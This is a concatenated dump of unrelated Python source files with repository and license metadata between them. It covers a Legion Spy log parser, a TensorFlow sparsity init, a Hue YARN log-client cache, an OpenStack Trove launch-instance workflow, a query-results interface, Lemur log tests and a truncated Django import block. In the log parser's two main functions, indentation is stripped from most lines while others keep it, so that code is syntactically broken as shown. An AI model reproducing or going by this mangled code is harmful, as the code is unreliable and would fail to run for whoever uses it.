memory_pat = re.compile(prefix+"Memory (?P<mid>[0-9a-f]+) (?P<capacity>[0-9]+)")
proc_mem_pat = re.compile(prefix+"Processor Memory (?P<pid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<band>[0-9]+) (?P<lat>[0-9]+)")
mem_mem_pat = re.compile(prefix+"Memory Memory (?P<mone>[0-9a-f]+) (?P<mtwo>[0-9a-f]+) (?P<band>[0-9]+) (?P<lat>[0-9]+)")
# Calls for the shape of region trees
top_index_pat = re.compile(prefix+"Index Space (?P<uid>[0-9a-f]+)")
top_index_name_pat = re.compile(prefix+"Index Space Name (?P<uid>[0-9a-f]+) (?P<name>\w+)")
index_part_pat = re.compile(prefix+"Index Partition (?P<pid>[0-9a-f]+) (?P<uid>[0-9a-f]+) (?P<disjoint>[0-1]) (?P<color>[0-9]+)")
index_part_name_pat = re.compile(prefix+"Index Partition Name (?P<uid>[0-9a-f]+) (?P<name>\w+)")
index_subspace_pat = re.compile(prefix+"Index Subspace (?P<pid>[0-9a-f]+) (?P<uid>[0-9a-f]+) (?P<color>[0-9]+)")
field_space_pat = re.compile(prefix+"Field Space (?P<uid>[0-9]+)")
field_space_name_pat = re.compile(prefix+"Field Space Name (?P<uid>[0-9]+) (?P<name>\w+)")
field_create_pat = re.compile(prefix+"Field Creation (?P<uid>[0-9]+) (?P<fid>[0-9]+)")
field_name_pat = re.compile(prefix+"Field Name (?P<uid>[0-9]+) (?P<fid>[0-9]+) (?P<name>\w+)")
region_pat = re.compile(prefix+"Region (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+)")
region_name_pat = re.compile(prefix+"Logical Region Name (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+) (?P<name>\w+)")
partition_name_pat = re.compile(prefix+"Logical Partition Name (?P<iid>[0-9a-f]+) (?P<fid>[0-9]+) (?P<tid>[0-9]+) (?P<name>\w+)")
# Logger calls for operations
top_task_pat = re.compile(prefix+"Top Task (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
single_task_pat = re.compile(prefix+"Individual Task (?P<ctx>[0-9]+) (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
index_task_pat = re.compile(prefix+"Index Task (?P<ctx>[0-9]+) (?P<tid>[0-9]+) (?P<uid>[0-9]+) (?P<name>\w+)")
mapping_pat = re.compile(prefix+"Mapping Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
close_pat = re.compile(prefix+"Close Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+) (?P<is_inter>[0-1])")
fence_pat = re.compile(prefix+"Fence Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
copy_op_pat = re.compile(prefix+"Copy Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
acquire_op_pat = re.compile(prefix+"Acquire Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
release_op_pat = re.compile(prefix+"Release Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
deletion_pat = re.compile(prefix+"Deletion Operation (?P<ctx>[0-9]+) (?P<uid>[0-9]+)")
index_slice_pat = re.compile(prefix+"Index Slice (?P<index>[0-9]+) (?P<slice>[0-9]+)")
slice_slice_pat = re.compile(prefix+"Slice Slice (?P<slice1>[0-9]+) (?P<slice2>[0-9]+)")
slice_point_pat = re.compile(prefix+"Slice Point (?P<slice>[0-9]+) (?P<point>[0-9]+) (?P<dim>[0-9]+) (?P<val1>[0-9]+) (?P<val2>[0-9]+) (?P<val3>[0-9]+)")
point_point_pat = re.compile(prefix+"Point Point (?P<point1>[0-9]+) (?P<point2>[0-9]+)")
# Logger calls for phase barriers
phase_barrier_pat = re.compile(prefix+"Phase Barrier (?P<uid>[0-9a-f]+)")
# Logger calls for logical mapping dependence analysis
requirement_pat = re.compile(prefix+"Logical Requirement (?P<uid>[0-9]+) (?P<index>[0-9]+) (?P<is_reg>[0-1]) (?P<ispace>[0-9a-f]+) (?P<fspace>[0-9]+) (?P<tid>[0-9]+) (?P<priv>[0-9]+) (?P<coher>[0-9]+) (?P<redop>[0-9]+)")
req_field_pat = re.compile(prefix+"Logical Requirement Field (?P<uid>[0-9]+) (?P<index>[0-9]+) (?P<fid>[0-9]+)")
mapping_dep_pat = re.compile(prefix+"Mapping Dependence (?P<ctx>[0-9]+) (?P<prev_id>[0-9]+) (?P<pidx>[0-9]+) (?P<next_id>[0-9]+) (?P<nidx>[0-9]+) (?P<dtype>[0-9]+)")
# Logger calls for physical dependence analysis
task_inst_req_pat = re.compile(prefix+"Task Instance Requirement (?P<uid>[0-9]+) (?P<idx>[0-9]+) (?P<index>[0-9]+)")
# Logger calls for events
event_event_pat = re.compile(prefix+"Event Event (?P<idone>[0-9a-f]+) (?P<genone>[0-9]+) (?P<idtwo>[0-9a-f]+) (?P<gentwo>[0-9]+)")
implicit_event_pat = re.compile(prefix+"Implicit Event (?P<idone>[0-9a-f]+) (?P<genone>[0-9]+) (?P<idtwo>[0-9a-f]+) (?P<gentwo>[0-9]+)")
op_event_pat = re.compile(prefix+"Op Events (?P<uid>[0-9]+) (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+)")
copy_event_pat = re.compile(prefix+"Copy Events (?P<srcman>[0-9a-f]+) (?P<dstman>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tree>[0-9]+) (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+) (?P<redop>[0-9]+)")
copy_field_pat = re.compile(prefix+"Copy Field (?P<startid>[0-9a-f]+) (?P<startgen>[0-9]+) (?P<termid>[0-9a-f]+) (?P<termgen>[0-9]+) (?P<fid>[0-9]+)")
# Logger calls for physical instance usage
physical_inst_pat = re.compile(prefix+"Physical Instance (?P<iid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tid>[0-9]+)")
physical_reduc_pat = re.compile(prefix+"Reduction Instance (?P<iid>[0-9a-f]+) (?P<mid>[0-9a-f]+) (?P<index>[0-9a-f]+) (?P<field>[0-9]+) (?P<tid>[0-9]+) (?P<fold>[0-1]) (?P<indirect>[0-9]+)")
op_user_pat = re.compile(prefix+"Op Instance User (?P<uid>[0-9]+) (?P<idx>[0-9]+) (?P<iid>[0-9a-f]+)")
op_proc_user_pat = re.compile(prefix+"Op Processor User (?P<uid>[0-9]+) (?P<pid>[0-9a-f]+)")
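# An illustrative line matched by processor_pat (hypothetical values):
#   [0 - 7f1c] {spew}{legion_spy}: Processor 1d0001 2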
def parse_log_line(line, state):
# Machine shapes
m = utility_pat.match(line)
    if m is not None:
if state.add_utility(int(m.group('pid'),16)):
return True
m = processor_pat.match(line)
    if m is not None:
if state.add_processor(int(m.group('pid'),16), int(m.group('kind'))):
return True
m = memory_pat.match(line)
    if m is not None:
if state.add_memory(int(m.group('mid'),16), int(m.group('capacity'))):
return True
m = proc_mem_pat.match(line)
    if m is not None:
if state.set_proc_mem(int(m.group('pid'),16), int(m.group('mid'),16), int(m.group('band')), int(m.group('lat'))):
return True
m = mem_mem_pat.match(line)
    if m is not None:
if state.set_mem_mem(int(m.group('mone'),16), int(m.group('mtwo'),16), int(m.group('band')), int(m.group('lat'))):
return True
# Region tree shapes
m = top_index_pat.match(line)
    if m is not None:
if state.add_index_space(int(m.group('uid'),16)):
return True
m = top_index_name_pat.match(line)
    if m is not None:
if state.add_index_space_name(int(m.group('uid'),16), m.group('name')):
return True
m = index_part_pat.match(line)
    if m is not None:
if state.add_index_partition(int(m.group('pid'),16), int(m.group('uid'),16), True if (int(m.group('disjoint'))) == 1 else False, int(m.group('color'))):
return True
m = index_part_name_pat.match(line)
    if m is not None:
if state.add_index_partition_name(int(m.group('uid'),16), m.group('name')):
return True
m = index_subspace_pat.match(line)
    if m is not None:
if state.add_index_subspace(int(m.group('pid'),16), int(m.group('uid'),16), int(m.group('color'))):
return True
m = field_space_pat.match(line)
    if m is not None:
if state.add_field_space(int(m.group('uid'))):
return True
m = field_space_name_pat.match(line)
    if m is not None:
if state.add_field_space_name(int(m.group('uid')), m.group('name')):
return True
m = field_create_pat.match(line)
    if m is not None:
if state.add_field(int(m.group('uid')), int(m.group('fid'))):
return True
m = field_name_pat.match(line)
    if m is not None:
if state.add_field_name(int(m.group('uid')), int(m.group('fid')), m.group('name')):
return True
m = region_pat.match(line)
    if m is not None:
if state.add_region(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid'))):
return True
m = region_name_pat.match(line)
    if m is not None:
if state.add_region_name(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid')), m.group('name')):
return True
m = partition_name_pat.match(line)
    if m is not None:
if state.add_partition_name(int(m.group('iid'),16), int(m.group('fid')), int(m.group('tid')), m.group('name')):
return True
# Operations
m = top_task_pat.match(line)
    if m is not None:
if state.add_top_task(int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = single_task_pat.match(line)
    if m is not None:
if state.add_single_task(int(m.group('ctx')), int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = index_task_pat.match(line)
    if m is not None:
if state.add_index_task(int(m.group('ctx')), int(m.group('tid')), int(m.group('uid')), m.group('name')):
return True
m = mapping_pat.match(line)
    if m is not None:
if state.add_mapping(int(m.group('ctx')), int(m.group('uid'))):
return True
m = close_pat.match(line)
    if m is not None:
if state.add_close(int(m.group('ctx')), int(m.group('uid')), True if int(m.group('is_inter')) == 1 else False):
return True
m = fence_pat.match(line)
    if m is not None:
if state.add_fence(int(m.group('ctx')), int(m.group('uid'))):
return True
m = copy_op_pat.match(line)
    if m is not None:
if state.add_copy_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = acquire_op_pat.match(line)
    if m is not None:
if state.add_acquire_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = release_op_pat.match(line)
    if m is not None:
if state.add_release_op(int(m.group('ctx')), int(m.group('uid'))):
return True
m = deletion_pat.match(line)
    if m is not None:
if state.add_deletion(int(m.group('ctx')), int(m.group('uid'))):
return True
m = index_slice_pat.match(line)
    if m is not None:
if state.add_index_slice(int(m.group('index')),int(m.group('slice'))):
return True
m = slice_slice_pat.match(line)
    if m is not None:
if state.add_slice_slice(int(m.group('slice1')),int(m.group('slice2'))):
return True
m = slice_point_pat.match(line)
    if m is not None:
if state.add_slice_point(int(m.group('slice')),int(m.group('point')), int(m.group('dim')), int(m.group('val1')), int(m.group('val2')), int(m.group('val3'))):
return True
m = point_point_pat.match(line)
    if m is not None:
if state.add_point_point(int(m.group('point1')),int(m.group('point2'))):
return True
# Phase Barriers
m = phase_barrier_pat.match(line)
    if m is not None:
if state.add_phase_barrier(int(m.group('uid'), 16)):
return True
# Mapping dependence analysis
m = requirement_pat.match(line)
    if m is not None:
if state.add_requirement(int(m.group('uid')), int(m.group('index')), True if (int(m.group('is_reg')))==1 else False, int(m.group('ispace'),16), int(m.group('fspace')), int(m.group('tid')), int(m.group('priv')), int(m.group('coher')), int(m.group('redop'))):
return True
m = req_field_pat.match(line)
    if m is not None:
if state.add_req_field(int(m.group('uid')), int(m.group('index')), int(m.group('fid'))):
return True
m = mapping_dep_pat.match(line)
    if m is not None:
if state.add_mapping_dependence(int(m.group('ctx')), int(m.group('prev_id')), int(m.group('pidx')), int(m.group('next_id')), int(m.group('nidx')), int(m.group('dtype'))):
return True
# Physical dependence analysis
m = task_inst_req_pat.match(line)
    if m is not None:
if state.add_instance_requirement(int(m.group('uid')), int(m.group('idx')), int(m.group('index'))):
return True
# Physical Analysis
m = event_event_pat.match(line)
    if m is not None:
if state.add_event_dependence(int(m.group('idone'),16), int(m.group('genone')), int(m.group('idtwo'),16), int(m.group('gentwo'))):
return True
m = implicit_event_pat.match(line)
    if m is not None:
if state.add_implicit_dependence(int(m.group('idone'),16), int(m.group('genone')), int(m.group('idtwo'),16), int(m.group('gentwo'))):
return True
m = op_event_pat.match(line)
    if m is not None:
if state.add_op_events(int(m.group('uid')), int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen'))):
return True
m = copy_event_pat.match(line)
    if m is not None:
if state.add_copy_events(int(m.group('srcman'),16), int(m.group('dstman'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tree')), int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen')), int(m.group('redop'))):
return True
m = copy_field_pat.match(line)
    if m is not None:
if state.add_copy_field_to_copy_event(int(m.group('startid'),16), int(m.group('startgen')), int(m.group('termid'),16), int(m.group('termgen')), int(m.group('fid'))):
return True
# Physical instance usage
m = physical_inst_pat.match(line)
    if m is not None:
if state.add_physical_instance(int(m.group('iid'),16), int(m.group('mid'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tid'))):
return True
m = physical_reduc_pat.match(line)
    if m is not None:
if state.add_reduction_instance(int(m.group('iid'),16), int(m.group('mid'),16), int(m.group('index'),16), int(m.group('field')), int(m.group('tid')), True if (int(m.group('fold')) == 1) else False, int(m.group('indirect'))):
return True
m = op_user_pat.match(line)
    if m is not None:
if state.add_op_user(int(m.group('uid')), int(m.group('idx')), int(m.group('iid'),16)):
return True
m = op_proc_user_pat.match(line)
    if m is not None:
if state.add_op_proc_user(int(m.group('uid')), int(m.group('pid'),16)):
return True
return False
def parse_log_file(file_name, state):
log = open(file_name, 'r')
matches = 0
    # Some lines may fail to parse on the first pass because entries can be
    # written to the log file out of order, so collect them and retry below.
replay_lines = list()
for line in log:
# Do a quick check to see if we match the prefix
# If not then we can skip the line entirely
m = prefix_pat.match(line)
        if m is None:
            continue
        # The prefix matched, so try to parse the rest of the line
if parse_log_line(line, state):
matches += 1
else:
replay_lines.append(line)
log.close()
# Now see if we have lines that need to be replayed
while len(replay_lines) > 0:
to_delete = set()
for line in replay_lines:
if parse_log_line(line, state):
to_delete.add(line)
# Now check to make sure we actually did something
# If not then we're not making forward progress which is bad
if len(to_delete) == 0:
print "ERROR: NO PROGRESS PARSING! BUG IN LEGION SPY LOGGING ASSUMPTIONS!"
for line in replay_lines:
print line
assert False
# Now delete any lines to delete and go again until we're done
for line in to_delete:
replay_lines.remove(line)
return matches
# EOF
|
SKA-ScienceDataProcessor/legion-sdp-clone
|
tools/spy_parser.py
|
Python
|
apache-2.0
| 16,815
|
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Module containing code for sparsity."""
from tensorflow_model_optimization.python.core.api.sparsity import keras
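# Illustrative downstream usage (assuming the public tfmot API surface):
#   import tensorflow_model_optimization as tfmot
#   pruned_model = tfmot.sparsity.keras.prune_low_magnitude(model)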
|
tensorflow/model-optimization
|
tensorflow_model_optimization/python/core/api/sparsity/__init__.py
|
Python
|
apache-2.0
| 805
|
#!/usr/bin/env python
# Licensed to Cloudera, Inc. under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. Cloudera, Inc. licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
import urlparse
import heapq
from desktop.lib.rest.http_client import HttpClient
from desktop.lib.maprsasl import HttpMaprAuth
from hadoop import cluster
LOG = logging.getLogger(__name__)
MAX_HEAP_SIZE = 20
_log_client_heap = []
_log_client_lock = threading.Lock()
def get_log_client(log_link):
  global _log_client_heap
global MAX_HEAP_SIZE
_log_client_lock.acquire()
try:
components = urlparse.urlsplit(log_link)
base_url = '%(scheme)s://%(netloc)s' % {
'scheme': components[0],
'netloc': components[1]
}
    # Heap entries take the form (epoch time, client object);
    # eviction follows a Least Recently Used policy.
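    # An illustrative entry: (1469112000.0, <HttpClient base_url='http://rm-host:8088'>)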
client_tuple = next((tup for tup in _log_client_heap if tup[1].base_url == base_url), None)
if client_tuple is None:
client = HttpClient(base_url, logger=LOG)
yarn_cluster = cluster.get_cluster_conf_for_job_submission()
client.set_verify(yarn_cluster.SSL_CERT_CA_VERIFY.get())
if yarn_cluster.SECURITY_ENABLED.get():
auth_clients = {'MAPR-SECURITY': HttpMaprAuth}
mechanism = yarn_cluster.MECHANISM.get()
if mechanism in auth_clients:
client._session.auth = auth_clients[mechanism]()
else:
client.set_kerberos_auth()
else:
_log_client_heap.remove(client_tuple)
client = client_tuple[1]
new_client_tuple = (time.time(), client)
if len(_log_client_heap) >= MAX_HEAP_SIZE:
heapq.heapreplace(_log_client_heap, new_client_tuple)
else:
heapq.heappush(_log_client_heap, new_client_tuple)
return client
finally:
_log_client_lock.release()
|
mapr/hue
|
desktop/libs/hadoop/src/hadoop/yarn/clients.py
|
Python
|
apache-2.0
| 2,439
|
# Copyright 2013 Rackspace Hosting
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.conf import settings
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon.utils import memoized
from horizon import workflows
from openstack_dashboard import api as dash_api
from openstack_dashboard.dashboards.project.instances \
import utils as instance_utils
from trove_dashboard import api
LOG = logging.getLogger(__name__)
class SetInstanceDetailsAction(workflows.Action):
name = forms.CharField(max_length=80, label=_("Instance Name"))
flavor = forms.ChoiceField(label=_("Flavor"),
help_text=_("Size of image to launch."))
volume = forms.IntegerField(label=_("Volume Size"),
min_value=0,
initial=1,
help_text=_("Size of the volume in GB."))
datastore = forms.ChoiceField(label=_("Datastore"),
help_text=_(
"Type and version of datastore."))
class Meta(object):
name = _("Details")
help_text_template = "project/databases/_launch_details_help.html"
def clean(self):
if self.data.get("datastore", None) == "select_datastore_type_version":
msg = _("You must select a datastore type and version.")
self._errors["datastore"] = self.error_class([msg])
return self.cleaned_data
@memoized.memoized_method
def flavors(self, request):
try:
return api.trove.flavor_list(request)
except Exception:
LOG.exception("Exception while obtaining flavors list")
redirect = reverse("horizon:project:databases:index")
exceptions.handle(request,
_('Unable to obtain flavors.'),
redirect=redirect)
def populate_flavor_choices(self, request, context):
flavors = self.flavors(request)
if flavors:
return instance_utils.sort_flavor_list(request, flavors)
return []
@memoized.memoized_method
def datastores(self, request):
try:
return api.trove.datastore_list(request)
except Exception:
LOG.exception("Exception while obtaining datastores list")
            return []
@memoized.memoized_method
def datastore_versions(self, request, datastore):
try:
return api.trove.datastore_version_list(request, datastore)
except Exception:
LOG.exception("Exception while obtaining datastore version list")
            return []
def populate_datastore_choices(self, request, context):
choices = ()
set_initial = False
datastores = self.datastores(request)
if datastores is not None:
num_datastores_with_one_version = 0
for ds in datastores:
versions = self.datastore_versions(request, ds.name)
if not set_initial:
if len(versions) >= 2:
set_initial = True
elif len(versions) == 1:
num_datastores_with_one_version += 1
if num_datastores_with_one_version > 1:
set_initial = True
if versions:
# only add to choices if datastore has at least one version
version_choices = ()
for v in versions:
version_choices = (version_choices +
((ds.name + ',' + v.name, v.name),))
datastore_choices = (ds.name, version_choices)
choices = choices + (datastore_choices,)
if set_initial:
# prepend choice to force user to choose
initial = (('select_datastore_type_version',
_('Select datastore type and version')))
choices = (initial,) + choices
return choices
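# Note (illustrative): populate_datastore_choices above returns Django-style
# grouped choices, e.g.
#   (('select_datastore_type_version', u'Select datastore type and version'),
#    ('mysql', (('mysql,5.6', u'5.6'), ('mysql,5.7', u'5.7'))))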
TROVE_ADD_USER_PERMS = getattr(settings, 'TROVE_ADD_USER_PERMS', [])
TROVE_ADD_DATABASE_PERMS = getattr(settings, 'TROVE_ADD_DATABASE_PERMS', [])
TROVE_ADD_PERMS = TROVE_ADD_USER_PERMS + TROVE_ADD_DATABASE_PERMS
class SetInstanceDetails(workflows.Step):
action_class = SetInstanceDetailsAction
contributes = ("name", "volume", "flavor", "datastore")
class SetNetworkAction(workflows.Action):
network = forms.MultipleChoiceField(label=_("Networks"),
widget=forms.CheckboxSelectMultiple(),
error_messages={
'required': _(
"At least one network must"
" be specified.")},
help_text=_("Launch instance with"
" these networks"))
def __init__(self, request, *args, **kwargs):
super(SetNetworkAction, self).__init__(request, *args, **kwargs)
network_list = self.fields["network"].choices
if len(network_list) == 1:
self.fields['network'].initial = [network_list[0][0]]
class Meta(object):
name = _("Networking")
permissions = ('openstack.services.network',)
help_text = _("Select networks for your instance.")
def populate_network_choices(self, request, context):
try:
tenant_id = self.request.user.tenant_id
networks = dash_api.neutron.network_list_for_tenant(request,
tenant_id)
network_list = [(network.id, network.name_or_id)
for network in networks]
except Exception:
network_list = []
exceptions.handle(request,
_('Unable to retrieve networks.'))
return network_list
class SetNetwork(workflows.Step):
action_class = SetNetworkAction
template_name = "project/databases/_launch_networks.html"
contributes = ("network_id",)
def contribute(self, data, context):
if data:
networks = self.workflow.request.POST.getlist("network")
# If no networks are explicitly specified, network list
# contains an empty string, so remove it.
networks = [n for n in networks if n != '']
if networks:
context['network_id'] = networks
return context
class AddDatabasesAction(workflows.Action):
"""Initialize the database with users/databases. This tab will honor
the settings which should be a list of permissions required:
* TROVE_ADD_USER_PERMS = []
* TROVE_ADD_DATABASE_PERMS = []
"""
databases = forms.CharField(label=_('Initial Databases'),
required=False,
help_text=_('Comma separated list of '
'databases to create'))
user = forms.CharField(label=_('Initial Admin User'),
required=False,
help_text=_("Initial admin user to add"))
password = forms.CharField(widget=forms.PasswordInput(),
label=_("Password"),
required=False)
host = forms.CharField(label=_("Allowed Host (optional)"),
required=False,
help_text=_("Host or IP that the user is allowed "
"to connect through."))
class Meta(object):
name = _("Initialize Databases")
permissions = TROVE_ADD_PERMS
help_text_template = "project/databases/_launch_initialize_help.html"
def clean(self):
cleaned_data = super(AddDatabasesAction, self).clean()
if cleaned_data.get('user'):
if not cleaned_data.get('password'):
msg = _('You must specify a password if you create a user.')
self._errors["password"] = self.error_class([msg])
if not cleaned_data.get('databases'):
msg = _('You must specify at least one database if '
'you create a user.')
self._errors["databases"] = self.error_class([msg])
return cleaned_data
class InitializeDatabase(workflows.Step):
action_class = AddDatabasesAction
contributes = ["databases", 'user', 'password', 'host']
class AdvancedAction(workflows.Action):
initial_state = forms.ChoiceField(
label=_('Source for Initial State'),
required=False,
help_text=_("Choose initial state."),
choices=[
('', _('None')),
('backup', _('Restore from Backup')),
('master', _('Replicate from Instance'))],
widget=forms.Select(attrs={
'class': 'switchable',
'data-slug': 'initial_state'
}))
backup = forms.ChoiceField(
label=_('Backup Name'),
required=False,
help_text=_('Select a backup to restore'),
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'initial_state',
'data-initial_state-backup': _('Backup Name')
}))
master = forms.ChoiceField(
label=_('Master Instance Name'),
required=False,
help_text=_('Select a master instance'),
widget=forms.Select(attrs={
'class': 'switched',
'data-switch-on': 'initial_state',
'data-initial_state-master': _('Master Instance Name')
}))
class Meta(object):
name = _("Advanced")
help_text_template = "project/databases/_launch_advanced_help.html"
def populate_backup_choices(self, request, context):
try:
backups = api.trove.backup_list(request)
choices = [(b.id, b.name) for b in backups
if b.status == 'COMPLETED']
except Exception:
choices = []
if choices:
choices.insert(0, ("", _("Select backup")))
else:
choices.insert(0, ("", _("No backups available")))
return choices
def populate_master_choices(self, request, context):
try:
instances = api.trove.instance_list(request)
choices = [(i.id, i.name) for i in
instances if i.status == 'ACTIVE']
except Exception:
choices = []
if choices:
choices.insert(0, ("", _("Select instance")))
else:
choices.insert(0, ("", _("No instances available")))
return choices
def clean(self):
cleaned_data = super(AdvancedAction, self).clean()
initial_state = cleaned_data.get("initial_state")
if initial_state == 'backup':
backup = self.cleaned_data['backup']
if backup:
try:
bkup = api.trove.backup_get(self.request, backup)
self.cleaned_data['backup'] = bkup.id
except Exception:
raise forms.ValidationError(_("Unable to find backup!"))
else:
raise forms.ValidationError(_("A backup must be selected!"))
cleaned_data['master'] = None
elif initial_state == 'master':
master = self.cleaned_data['master']
if master:
try:
api.trove.instance_get(self.request, master)
except Exception:
raise forms.ValidationError(
_("Unable to find master instance!"))
else:
raise forms.ValidationError(
_("A master instance must be selected!"))
cleaned_data['backup'] = None
else:
cleaned_data['master'] = None
cleaned_data['backup'] = None
return cleaned_data
class Advanced(workflows.Step):
action_class = AdvancedAction
contributes = ['backup', 'master']
class LaunchInstance(workflows.Workflow):
slug = "launch_instance"
name = _("Launch Instance")
finalize_button_name = _("Launch")
success_message = _('Launched %(count)s named "%(name)s".')
failure_message = _('Unable to launch %(count)s named "%(name)s".')
success_url = "horizon:project:databases:index"
default_steps = (SetInstanceDetails,
SetNetwork,
InitializeDatabase,
Advanced)
def __init__(self, request=None, context_seed=None, entry_point=None,
*args, **kwargs):
super(LaunchInstance, self).__init__(request, context_seed,
entry_point, *args, **kwargs)
self.attrs['autocomplete'] = (
settings.HORIZON_CONFIG.get('password_autocomplete'))
def format_status_message(self, message):
name = self.context.get('name', 'unknown instance')
return message % {"count": _("instance"), "name": name}
def _get_databases(self, context):
"""Returns the initial databases for this instance."""
databases = None
if context.get('databases'):
dbs = context['databases']
databases = [{'name': d.strip()} for d in dbs.split(',')]
return databases
def _get_users(self, context):
users = None
if context.get('user'):
user = {
'name': context['user'],
'password': context['password'],
'databases': self._get_databases(context),
}
if context['host']:
user['host'] = context['host']
users = [user]
return users
def _get_backup(self, context):
backup = None
if context.get('backup'):
backup = {'backupRef': context['backup']}
return backup
def _get_nics(self, context):
netids = context.get('network_id', None)
if netids:
return [{"net-id": netid, "v4-fixed-ip": ""}
for netid in netids]
else:
return None
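    # _get_nics above returns, e.g. (illustrative IDs):
    #   [{"net-id": "net-uuid-1", "v4-fixed-ip": ""},
    #    {"net-id": "net-uuid-2", "v4-fixed-ip": ""}]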
def handle(self, request, context):
try:
datastore = self.context['datastore'].split(',')[0]
datastore_version = self.context['datastore'].split(',')[1]
LOG.info("Launching database instance with parameters "
"{name=%s, volume=%s, flavor=%s, "
"datastore=%s, datastore_version=%s, "
"dbs=%s, users=%s, "
"backups=%s, nics=%s, replica_of=%s}",
context['name'], context['volume'], context['flavor'],
datastore, datastore_version,
self._get_databases(context), self._get_users(context),
self._get_backup(context), self._get_nics(context),
context.get('master'))
api.trove.instance_create(request,
context['name'],
context['volume'],
context['flavor'],
datastore=datastore,
datastore_version=datastore_version,
databases=self._get_databases(context),
users=self._get_users(context),
restore_point=self._get_backup(context),
nics=self._get_nics(context),
replica_of=context.get('master'))
return True
except Exception:
exceptions.handle(request)
return False
|
dklyle/trove-dashboard
|
trove_dashboard/content/databases/workflows/create_instance.py
|
Python
|
apache-2.0
| 16,628
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
###############################################################################
# Module: query_results
# Purpose: An interface definition for retrieving query results
#
# Notes:
###############################################################################
from abc import ABCMeta, abstractmethod
class QueryResults(object):
    __metaclass__ = ABCMeta
def __init__(self):
pass
def __iter__(self):
return self
@abstractmethod
def next(self):
pass
@abstractmethod
def fetchone(self):
pass
@abstractmethod
def fetchall(self):
pass
@abstractmethod
def fetchmany(self, arraysize=None):
pass
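# Illustrative sketch (not part of this interface): a concrete implementation
# would subclass QueryResults and supply the abstract methods, e.g.
#   class ListQueryResults(QueryResults):
#       def __init__(self, rows):
#           super(ListQueryResults, self).__init__()
#           self._rows = iter(rows)
#       def next(self):
#           return next(self._rows)
#       ... plus fetchone/fetchall/fetchmany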
|
iagcl/data_pipeline
|
data_pipeline/db/query_results.py
|
Python
|
apache-2.0
| 1,482
|
import pytest
from lemur.tests.vectors import VALID_ADMIN_HEADER_TOKEN, VALID_USER_HEADER_TOKEN
from lemur.logs.views import * # noqa
def test_private_key_audit(client, certificate):
from lemur.certificates.views import CertificatePrivateKey, api
assert len(certificate.logs) == 0
client.get(api.url_for(CertificatePrivateKey, certificate_id=certificate.id), headers=VALID_ADMIN_HEADER_TOKEN)
assert len(certificate.logs) == 1
@pytest.mark.parametrize("token,status", [
(VALID_USER_HEADER_TOKEN, 200),
(VALID_ADMIN_HEADER_TOKEN, 200),
('', 401)
])
def test_get_logs(client, token, status):
assert client.get(api.url_for(LogsList), headers=token).status_code == status
|
nevins-b/lemur
|
lemur/tests/test_logs.py
|
Python
|
apache-2.0
| 706
|
from django.core.management.base import BaseCommand, CommandError
from django.core.management import call_command
from django.conf import settings
from django.db import connection
from django.db.models import Q
from django.template.loader import render_to_string
